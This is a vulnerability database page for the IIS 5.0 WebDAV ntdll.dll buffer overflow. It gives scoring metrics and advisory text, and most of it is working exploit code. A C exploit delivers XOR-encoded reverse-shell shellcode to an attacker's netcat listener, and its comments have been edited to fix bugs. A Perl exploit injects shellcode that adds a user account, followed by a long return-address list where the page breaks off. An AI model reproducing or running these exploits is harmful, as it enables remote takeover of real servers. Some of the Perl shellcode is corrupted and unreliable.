Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited in the wild.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore lets you compare one CVE's EPSS score against the rest of the population.
Exploit information
Exploit Database EDB-ID : 1
Publication date : 2003-03-22 23h00 +00:00
Author : kralor
EDB Verified : Yes
/*******************************************************************/
/* [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib,"ws2_32")
/*
 * Reverse-shell payload.  Everything from offset 0x34 onward is stored
 * XOR-encoded with 0x95 ("to avoid bad chars") and is decoded in place by
 * main() just before the request is built (0x1b0 bytes starting at 0x34).
 *
 * Trailing data, as used by main():
 *   - the NUL-separated import names (CreateProcessA, LoadLibraryA,
 *     ws2_32.dll, WSASocketA, connect) are resolved by the stub at run time;
 *   - right after "connect\0" comes a 16-byte sockaddr_in image:
 *       02 00        AF_INET
 *       02 9A        port 666 in network order  -> main() patches [446..447]
 *       C0 A8 01 01  192.168.1.1                -> main() patches [448..451]
 *   - "cmd" is the program CreateProcessA is pointed at;
 *   - the final DWORDs are candidate kernel32.dll base offsets per Windows
 *     version, terminated by 0xffffffff (the author's comments mark the
 *     win2k3 and win9x entries).
 * The 446/448 offsets in main() depend on this exact byte layout; do not
 * reorder or insert anything before the sockaddr_in block.
 */
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"  /* sockaddr_in image; port/addr patched by main() */
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff"; // end-of-list marker for the offset table
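/*
 * Probe whether WebDAV is enabled on `host` (TCP port 80) by sending a
 * bare SEARCH request with no body.  The IIS WebDAV handler answers such a
 * request with "411 Length Required"; any other status, a failed connect,
 * or an unresolvable name is reported as "not found".
 *
 * Returns 0 when the 411 status line is seen, 1 otherwise.
 *
 * Fixes relative to the original: the socket is closed on every path (it
 * was never closed), recv() leaves room for a terminator and its return
 * value is checked before the status bytes are inspected, and the
 * sockaddr_in is zeroed before use.
 */
int test_host(char *host)
{
	char search[100] = "";
	char buf[100] = "";
	int sock;
	int n;
	struct hostent *heh;
	struct sockaddr_in hmm;

	/* search[] holds ~30 bytes of fixed text plus the host name; 60 keeps
	 * the sprintf() below well inside the 100-byte array. */
	if (strlen(host) > 60) {
		printf("error: victim host too long.\r\n");
		return 1;
	}
	if ((heh = gethostbyname(host)) == 0) {
		printf("error: can't resolve '%s'", host);
		return 1;
	}
	sprintf(search, "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n", host);

	memset(&hmm, 0, sizeof(hmm));
	hmm.sin_port = htons(80);
	hmm.sin_family = AF_INET;
	hmm.sin_addr = *((struct in_addr *)heh->h_addr);

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("error: can't create socket");
		return 1;
	}
	printf("Checking WebDav on '%s' ... ", host);
	if (connect(sock, (struct sockaddr *)&hmm, sizeof(hmm)) == -1) {
		printf("CONNECTING_ERROR\r\n");
		closesocket(sock);
		return 1;
	}
	send(sock, search, strlen(search), 0);

	/* Read at most sizeof(buf)-1 bytes so buf stays NUL-terminated. */
	n = recv(sock, buf, sizeof(buf) - 1, 0);
	closesocket(sock);

	/* "HTTP/1.1 411 ..." -- the status code starts at offset 9, so at
	 * least 12 bytes must have arrived before those bytes mean anything. */
	if (n >= 12 && buf[9] == '4' && buf[10] == '1' && buf[11] == '1')
		return 0;
	printf("NOT FOUND\r\n");
	return 1;
}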
/* Print the command-line usage line; `program` is argv[0] as typed by the user. */
void help(char *program)
{
	const char *usage = "syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n";

	printf(usage, program);
}
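/*
 * Print the tool's banner.
 *
 * Fix: in the listing the first string literal was broken across two
 * lines (a raw newline inside "..."), which is not valid C; it is joined
 * back into one literal here with no change to the printed text.
 */
void banner(void)
{
	printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]\r\n");
	printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
}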
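/*
 * Entry point.  argv: <victim_host> <your_host> <your_port> [padding]
 *
 * Flow: confirm the target answers WebDAV SEARCH (test_host), patch the
 * listener IP/port into the payload, XOR-decode the payload, build one
 * SEARCH request whose URI is a 65536-byte buffer (padding bytes, NOP
 * sled, payload), send it, and report whether the server replied.
 *
 * Fixes relative to the original listing (the bytes put on the wire are
 * unchanged):
 *  - the URI buffer is one byte larger so its NUL terminator is inside the
 *    array (the original wrote buffer[sizeof(buffer)], one past the end);
 *  - the request is formatted with a single sprintf() instead of
 *    sprintf(request, "%s...", request, ...), whose overlapping source
 *    and destination is undefined behaviour;
 *  - recv() into data[] leaves room for the terminator the later "%s"
 *    relies on, and its return value is checked;
 *  - the MSVC-only __asm decoder loop is an equivalent C loop, so the
 *    file builds with other compilers;
 *  - the socket is closed and winsock released on every exit path, and
 *    main returns int (non-zero on failure).
 */
int main(int argc, char *argv[])
{
	enum {
		URI_LEN        = 65536,   /* bytes of URI after "SEARCH /" */
		PAYLOAD_OFFSET = 64000,   /* where the decoded payload is placed */
		PAD_LEN        = 2500,    /* leading bytes set to the padding value */
		XOR_START      = 0x34,    /* first encoded byte of shellc0de */
		XOR_LEN        = 0x1b0,   /* number of encoded bytes */
		XOR_KEY        = 0x95
	};
	WSADATA wsaData;
	unsigned short port = 0;
	const char *port_bytes, *ip_bytes;
	char data[50] = {0};
	unsigned int i, j;
	unsigned int ip = 0;
	int s, n, PAD = 0x10;
	struct hostent *he;
	struct sockaddr_in crpt;
	char buffer[URI_LEN + 1];  /* +1: room for the NUL that "%s" needs */
	char request[80000];
	char content[] =
	    "<?xml version=\"1.0\"?>\r\n"
	    "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
	    "<g:sql>\r\n"
	    "Select \"DAV:displayname\" from scope()\r\n"
	    "</g:sql>\r\n"
	    "</g:searchrequest>\r\n";

	banner();
	if (argc < 4 || argc > 5) {
		help(argv[0]);
		return 1;
	}
	if (WSAStartup(0x0101, &wsaData) != 0) {
		printf("error starting winsock..");
		return 1;
	}
	/* test_host() also bounds argv[1] to 60 characters, which the
	 * request sprintf() below relies on. */
	if (test_host(argv[1])) {
		WSACleanup();
		return 1;
	}
	if (argc == 5)
		PAD += atoi(argv[4]);
	printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n", PAD, PAD);

	/* Patch the listener address into the sockaddr_in image that follows
	 * the "connect\0" string in shellc0de (family at 444, port at 446,
	 * address at 448).  Done before decoding, as in the original, so the
	 * patched bytes are XOR-encoded together with the rest. */
	ip = inet_addr(argv[2]);
	ip_bytes = (const char *)&ip;
	shellc0de[448] = ip_bytes[0];
	shellc0de[449] = ip_bytes[1];
	shellc0de[450] = ip_bytes[2];
	shellc0de[451] = ip_bytes[3];
	port = htons((unsigned short)atoi(argv[3]));
	port_bytes = (const char *)&port;
	shellc0de[446] = port_bytes[0];
	shellc0de[447] = port_bytes[1];

	/* XOR-decode shellc0de[0x34 .. 0x34+0x1b0).  Equivalent to the
	 * original inline asm (lea eax,shellc0de / add eax,0x34 / mov cx,0x1b0 /
	 * xor byte ptr [eax],0x95 / inc eax / loop).  With the initializer as
	 * listed this ends exactly at the terminating NUL; the guard refuses to
	 * run if the array is ever edited so that the window would overrun it. */
	if (XOR_START + XOR_LEN > sizeof(shellc0de) - 1) {
		printf("error: payload decode window exceeds shellc0de\r\n");
		WSACleanup();
		return 1;
	}
	for (i = 0; i < XOR_LEN; i++)
		shellc0de[XOR_START + i] ^= XOR_KEY;

	if ((he = gethostbyname(argv[1])) == 0) {
		printf("error: can't resolve '%s'", argv[1]);
		WSACleanup();
		return 1;
	}
	memset(&crpt, 0, sizeof(crpt));
	crpt.sin_port = htons(80);
	crpt.sin_family = AF_INET;
	crpt.sin_addr = *((struct in_addr *)he->h_addr);
	if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("error: can't create socket");
		WSACleanup();
		return 1;
	}
	printf("Connecting... ");
	if (connect(s, (struct sockaddr *)&crpt, sizeof(crpt)) == -1) {
		printf("ERROR\r\n");
		closesocket(s);
		WSACleanup();
		return 1;
	}

	/* URI layout (unchanged from the original):
	 *   [0, 2500)                       the padding byte (PAD)
	 *   [2500, 64000)                   NOP sled (0x90)
	 *   [64000, 64000+sizeof(shellc0de)-1)  decoded payload
	 *   up to [65536)                   NOP sled
	 *   [65536]                         NUL terminator (now in bounds)
	 * The original comments note that only two bytes around 2085/2086
	 * actually need the return-address value; the whole 2500-byte run is
	 * kept as the author shipped it. */
	memset(buffer, 0x90, URI_LEN);
	for (i = PAYLOAD_OFFSET, j = 0; i < URI_LEN && j < sizeof(shellc0de) - 1; i++, j++)
		buffer[i] = shellc0de[j];
	memset(buffer, PAD, PAD_LEN);   /* same as the per-byte (char)PAD store */
	buffer[URI_LEN] = '\0';

	/* One sprintf() for the whole header.  Worst case is 65536 bytes of
	 * URI + ~90 bytes of fixed text + a host of at most 60 bytes, which
	 * fits in the 80000-byte request[] with plenty of margin. */
	memset(request, 0, sizeof(request));
	sprintf(request,
	        "SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: %u\r\n\r\n",
	        buffer, argv[1], (unsigned)strlen(content));
	printf("CONNECTED\r\nSending evil request... ");
	send(s, request, strlen(request), 0);
	send(s, content, strlen(content), 0);
	printf("SENT\r\n");

	/* Any reply means the request was parsed normally (i.e. the target is
	 * patched or not vulnerable this way); no reply is the "good" case for
	 * the attacker.  sizeof(data)-1 keeps the terminator for "%s". */
	n = recv(s, data, sizeof(data) - 1, 0);
	if (n > 0) {
		data[n] = '\0';
		printf("Server seems to be patched.\r\n");
		printf("data: %s\r\n", data);
	} else {
		printf("Now if you are lucky you will get a shell.\r\n");
	}
	closesocket(s);
	WSACleanup();
	return 0;
}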
// milw0rm.com [2003-03-23]
Exploit Database EDB-ID : 22365
Publication date : 2003-03-23 23h00 +00:00
Author : mat
EDB Verified : Yes
E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
source: https://www.securityfocus.com/bid/7116/info
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.
#!/bin/perl
#
# 2003.3.24
#
#
[email protected]
#
[email protected]
#
# tested on Windows 2000 Advanced Server SP3: Korean language edition
# ntdll.dll with 2002.7.3 version
# You need to change some parameters to make this exploit work on your platform of choice
#
# This exploit uses unicode decoder scheme and self-modifies unicoded shellcode to original one.
#
use Socket;

# Exactly one positional argument: the target host name or address.
if($#ARGV<0)
{
die "usage: wd.pl <target hostname>\n";
}
my $host=$ARGV[0];
# Total length of the request URI.  The author's notes give a different
# trigger length per method: 65514 for LOCK, 65535 for SEARCH.
my $url_len=65514;
#LOCK: 65514
#SEARCH: 65535
my $host_header="Host: $host\r\n";
# The headers below are each defined and then immediately reset to "", so
# none of them is sent.  They are left in as switches for experimenting
# with other request shapes (Translate, Depth, Connection, Lock-Token,
# Destination); flip one by removing its "" reassignment.
my $translate_f="Translate: f\r\n";
$translate_f="";
my $port=80;
my $depth="Depth: 1\r\n";
$depth="";
my $connection_str="Connection: Close\r\n";
$connection_str="";
my $url2="B";
$url2="";
my $cont="C";
my $lock_token="Lock-Token: $cont\r\n";
$lock_token="";
my $destination="Destination: /$url2\r\n";
$destination="";
# The author's notes on the payload: the LoadLibrary/GetProcAddress
# addresses it was built against and the command it runs.  The bytes are
# stored in a printable form and are turned back into code at run time by
# the decoder stub prepended in the main loop.
# LoadLibrary: 0x100107c;
# GetProcAddress 0x1001034;
# WinExec("net user matt 1234 /ADD")
# this shellcode is encoded to printable string form
# NOTE(review): in this listing the string below is split across three
# physical lines (a trailing backslash at the end of one line, and a line
# beginning with "5\x56" where a "\x7" is evidently missing).  The exact
# original bytes cannot be recovered from the page, so it is reproduced
# as-is; do not expect this copy to decode to the author's payload.
my $shellcode="\x34\x34\x30\x2e\x2c\x2a\x61\x62\x48\x48\x2a\x2a\x2c\x2d\x7f\x80\x68\x69\x2c\x2c\x18\x19\x64\x65\x58\x59\x0c\x07%u0411%u00f0\x67\x67\x2c\x2a\x31\x2e\x18\x19\x64\x65\x58\x59\x7e\x7f\x56\x56\x1a\x1a\x4c\x4d\x55\x55\x71\x71\x7d\x7d\x38\x39\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x62\x62\x0c\x0c\x3b\x39\x4e\x4e\x6c\x6d\x6c\x6d\x4c\x4d\x38\x38\x5f\x60\x4c\x4d\x4c\x4d\x4c\x4d\x64\x64\x67\x68\x78\x79\x72\x73\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x08\x08\x2d\x2d\x60\x60\x08\x08\x33\x34\x64\x64\x67\x68\x65\x65\x78\x79\x56\x57\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x64\x65\x1a\x1b\x0e\x0f\x2c\x2d\x76\x76\x31\x31\x60\x61\x19\x19\x60\x60\x3d\x3e\x3b\x38\x2d\x2d\x0c\x08\x16\x16\x07\x08\x6c\x6d\x6c\x6d\x4c\x4d\x0c\x08\x12\x12\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x79\x7a\x4f\x50\x60\x60\x38\x39\x31\x2e\x33\x33\x33\x33\x33\x33\x54\x54\x27\x24\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x29\x29\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x16\x16\x38\x38\x6c\x6d\x6c\x6d\x4c\x4d\x08\x08\x39\x39\x0c\x0c\x2d\x2d\x3b\x39\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x64\x65\x08\x08\x2d\x2d\x33\x33\x06\x06\x1d\x1d\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x33\x33\x06\x06\x1f\x1f\x6c\x6d\x6c\x6d\x4c\x4d\x54\x54\x27\x24\x04\x05\x04\x05\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x27\x27\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x19\x19\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x06\x06\x1b\x1b\x6c\x6d\x6c\x6d\x4c\x4d\x69\x69\x6e\x6e\x65\x66\x6b\x6c\x6e\x6e\x6a\x6b\x55\x55\x55\x56\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x75\x76\x7e\x7e\x7c\x7c\x76\x77\x4c\x4d\x63\x63\x7a\x7b\x77\x77\x75\x76\x78\x78\x76\x77\x7e\x7e\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x7a\x7b\x7b\x7b\x75\x75\x7e\x7e\x4c\x4d\x67\x67\x78\x78\x7b\x7c\x6e\x6e\x70\x71\x7e\x7e\x7d\x7d\x4c\x4d\x6e\x6e\x70\x71\x78\x78\x76\x77\x64\x65\x75\x76\x7b\x7b\x7d\x7d\x7e\x7e\x75\x75\x75\x75\x4c\x4d\x7d\x7d\x51\x52\x62\x63\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x7b\x7c\x7e\x7e\x76\x77\x5e\x5b\x76\
x76\x75\x75\x7e\x7e\x75\x76\x5e\x5b\x7a\x7a\x7c\
5\x56\x57\x5e\x5b\x5b\x5b\x7c\x7c\x7e\x7f\x7e\x7f\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4e\x4e\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x7e\x7e\x75\x75\x76\x77\x49\x4a";
# Request body: the same DAV SEARCH query the other exploits on this page
# use.  NOTE(review): the XML declaration is written "<?xml version="1.0">"
# without the closing "?"; kept verbatim since it is what was sent.
my $body="<?xml version=\"1.0\">\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
my $length_of_body=length($body);
#
# Candidate return addresses, one per attempt of the main loop.  Each entry
# is two %u units.  The decoder string used later in this script shows how
# the URI is consumed: little-endian UTF-16 code units ("%uC931" becomes
# the bytes 31 C9, i.e. xor ecx,ecx), so "%u32ac%u77e2" is the dword
# 0x77e232ac.  The author describes them as jmp ebx / call ebx locations;
# they are specific to the DLL builds the author tested against
# (Windows 2000 Advanced Server SP3, Korean edition, per the header) and
# are not verified here.
#
# jmp ebx,call ebx addresses
#
my @return_addresses=(
"%u32ac%u77e2",
"%uc1b5%u76ae",
"%u005d%u77a5",
"%u0060%u776b",
"%u00b4%u77a5",
"%u00e6%u77ac",
"%u014a%u7766",
"%u0392%u7511",
"%u03a0%u7511",
"%u0900%u6df1",
"%u0900%u778b",
"%u1167%u6b32",
"%u1184%u6ed4",
"%u1192%u6b3e",
"%u11b1%u779e",
"%u11b9%u777f",
"%u11b9%u782c",
"%u11d3%u7834",
"%u1800%u749e",
"%u20ac%u777f",
"%u215c%u777e",
"%u2171%u7766",
"%u2172%u6b3a",
"%u2191%u6e6f",
"%u21d4%u6e6f",
"%u2283%u730a",
"%u24b9%u7763",
"%u24d5%u7763",
"%u24e8%u7761",
"%u2503%u7834",
"%u2514%u77e2",
"%u251e%u77db",
"%u2521%u7761",
"%u2527%u77db",
"%u2530%u77db",
"%u253c%u77e2",
"%u2547%u77dc",
"%u2592%u77dc",
"%u266d%u76ae",
"%u2e00%u76ae",
"%u300e%u74da",
"%u300e%u74e3",
"%u306c%u7766",
"%u30a5%u77e5",
"%u30b0%u77e5",
"%u327b%u6e44",
"%u327b%u6e5e",
"%u329b%u6e44",
"%u329b%u6e5e",
"%u329c%u77e2",
"%u3384%u7779",
"%u3384%u777e",
"%u3397%u6e00",
"%u33d0%u76ae",
"%u3700%u777f",
"%u4e5e%u7900",
"%u4ea4%u7325",
"%u4ec0%u77db",
"%u4ef2%u77ac",
"%u4f73%u749f",
"%u4fd4%u77dc",
"%u4ff1%u749f",
"%u5023%u749f",
"%u5078%u77a5",
"%u5112%u77dc",
"%u5121%u749f",
"%u5144%u77dc",
"%u5146%u77e2",
"%u514e%u77ac",
"%u518d%u6dee",
"%u51c4%u7387",
"%u5237%u77ac",
"%u52a0%u777f",
"%u52a0%u782c",
"%u52d5%u777f",
"%u52d5%u782c",
"%u52f8%u7800",
"%u5339%u6b3a",
"%u5339%u777f",
"%u5366%u7740",
"%u555e%u741b",
"%u5653%u749e",
"%u5718%u6c7e",
"%u574d%u7901",
"%u5775%u7901",
"%u5806%u7325",
"%u5821%u777f",
"%u5821%u782c",
"%u5831%u777f",
"%u5831%u782c",
"%u587c%u777f",
"%u587c%u782c",
"%u58c5%u777f",
"%u58d5%u777f",
"%u58fd%u777f",
"%u58fd%u782c",
"%u5949%u72fc",
"%u5949%u777f",
"%u5955%u72fc",
"%u5967%u777f",
"%u5997%u777f",
"%u5997%u782c",
"%u59bb%u777e",
"%u59d4%u777e",
"%u5a25%u777f",
"%u5a25%u782c",
"%u5ac9%u777f",
"%u5b5a%u6c7e",
"%u5b64%u777f",
"%u5b8f%u6731",
"%u5b9c%u6731",
"%u5b9c%u6e44",
"%u5c04%u777f",
"%u5c0f%u6c7e",
"%u5c3b%u777f",
"%u5c3b%u782c",
"%u5c4e%u6c7e",
"%u5cfb%u76ae",
"%u5da0%u7511",
"%u5da2%u777f",
"%u5de6%u77e5",
"%u5deb%u777f",
"%u5deb%u782c",
"%u5e00%u6c11",
"%u5e0c%u7325",
"%u5e2b%u777f",
"%u5e3f%u7511",
"%u5e55%u777f",
"%u5e63%u7325",
"%u5eb8%u7325",
"%u5ef7%u7325",
"%u5f13%u7325",
"%u5f17%u77e3",
"%u5f1b%u777f",
"%u5f1b%u782c",
"%u5f62%u7325",
"%u5f7f%u72fc",
"%u5f99%u7325",
"%u5fb7%u6c11",
"%u5fcc%u7763",
"%u601d%u77dc",
"%u609a%u7387",
"%u60f6%u72fc",
"%u611f%u77bf",
"%u6144%u74da",
"%u6144%u74e3",
"%u6198%u7763",
"%u61a9%u74da",
"%u61a9%u74e3",
"%u61fa%u66c7",
"%u61fa%u671b",
"%u620a%u7325",
"%u6284%u66c7",
"%u62c8%u7763",
"%u62db%u72fc",
"%u62f1%u72fc",
"%u63a9%u77bc",
"%u63ed%u779e",
"%u64bb%u7761",
"%u64c1%u72fd",
"%u64e2%u777f",
"%u64e2%u782c",
"%u64f4%u777f",
"%u65b9%u6ed4",
"%u6600%u6ed4",
"%u66a0%u6c6d",
"%u66b3%u6c6d",
"%u66f3%u6c6d",
"%u66f8%u7387",
"%u674f%u7763",
"%u67b0%u7740",
"%u67b3%u6ed4",
"%u67d2%u749e",
"%u6816%u6ed4",
"%u6842%u779e",
"%u6881%u779e",
"%u6894%u779e",
"%u68b3%u777e",
"%u6977%u76ae",
"%u6a19%u7763",
"%u6a44%u7763",
"%u6aa3%u7518",
"%u6c60%u77bc",
"%u6c81%u7693",
"%u6c82%u77bf",
"%u6c92%u77bc",
"%u6cb8%u7693",
"%u6cdb%u777f",
"%u6ce5%u777f",
"%u6ceb%u7693",
"%u6d11%u777f",
"%u6d11%u782c",
"%u6d87%u77dc",
"%u6d89%u7693",
"%u6e2f%u7693",
"%u6e4d%u76ae",
"%u6f94%u77e9",
"%u6fae%u77bc",
"%u6fe9%u749e",
"%u7006%u77e9",
"%u7028%u7901",
"%u70ab%u77ac",
"%u70ac%u7387",
"%u70dd%u77ac",
"%u70dd%u784f",
"%u70fd%u77bb",
"%u711a%u6731",
"%u7199%u7387",
"%u71d0%u77bb",
"%u71fc%u77bb",
"%u722d%u6df3",
"%u7258%u7515",
"%u725f%u77db",
"%u72a2%u77a5",
"%u72c4%u7325",
"%u73fe%u6ed4",
"%u745f%u76ae",
"%u748b%u730a",
"%u74d8%u6df3",
"%u74e3%u6df3",
"%u7575%u7518",
"%u7642%u6c0f",
"%u76de%u7325",
"%u7704%u7325",
"%u77dc%u7693",
"%u78a9%u77e2",
"%u78bb%u77bb",
"%u790e%u6995",
"%u797a%u6995",
"%u79b1%u6995",
"%u79b1%u7740",
"%u79d1%u77bb",
"%u79e7%u6995",
"%u79e9%u72fd",
"%u7a00%u78fb",
"%u7a05%u72fd",
"%u7a3b%u72fd",
"%u7a57%u7387",
"%u7aba%u6995",
"%u7af9%u6c13",
"%u7b19%u76ae",
"%u7b6e%u777f",
"%u7b6e%u782c",
"%u7c83%u7763",
"%u7c97%u7763",
"%u7ca5%u7763",
"%u7d8f%u77e5",
"%u7dbe%u779e",
"%u7de1%u779e",
"%u7e1f%u6df1",
"%u7e1f%u778b",
"%u7e52%u6995",
"%u7f55%u77a5",
"%u7fa8%u77a5",
"%u7fd5%u76ae",
"%u8018%u775b",
"%u807d%u7387",
"%u80a5%u775b",
"%u8178%u775b",
"%u81c0%u77db",
"%u82ad%u6c11",
"%u82d5%u65f1",
"%u832f%u77db",
"%u8339%u76ae",
"%u83d3%u6df3",
"%u843d%u7387",
"%u8563%u77ac",
"%u8805%u7740",
"%u881f%u77db",
"%u8840%u77bc",
"%u8892%u7740",
"%u8892%u77ac",
"%u8a23%u6731",
"%u8a23%u7693",
"%u8a23%u77ad",
"%u8af1%u76ae",
"%u8b17%u6ed4",
"%u8b39%u76ae",
"%u8c6b%u77bf",
"%u8c7a%u77bc",
"%u8ca2%u77bc",
"%u8cac%u6df1",
"%u8cac%u778b",
"%u8d70%u6995",
"%u8dbe%u7740",
"%u8dcb%u77ad",
"%u8dcf%u777e",
"%u8e87%u6995",
"%u8f09%u6b32",
"%u9187%u76ae",
"%u925e%u749e",
"%u92f8%u77ad",
"%u932e%u76ae",
"%u93ac%u7740",
"%u9640%u6995",
"%u980a%u7763",
"%u984e%u6df3",
"%u985e%u7763",
"%u98dc%u7740",
"%u9920%u7916",
"%u9957%u77a5",
"%u9a5a%u779e",
"%u9b27%u6ed3",
"%u9cf6%u7518",
"%u9d26%u7518",
"%u9d5d%u7300",
"%u9d72%u7763",
"%u9edc%u7901",
"%u9ede%u77e9",
"%ua300%u76ae",
"%uac16%u7900",
"%uac17%u77db",
"%uac17%u7832",
"%uac4b%u77db",
"%uac4b%u7900",
"%uac52%u76ae",
"%uac5a%u76ae",
"%uac71%u7693",
"%uac84%u77e9",
"%uac97%u77e3",
"%uaca2%u6ed3",
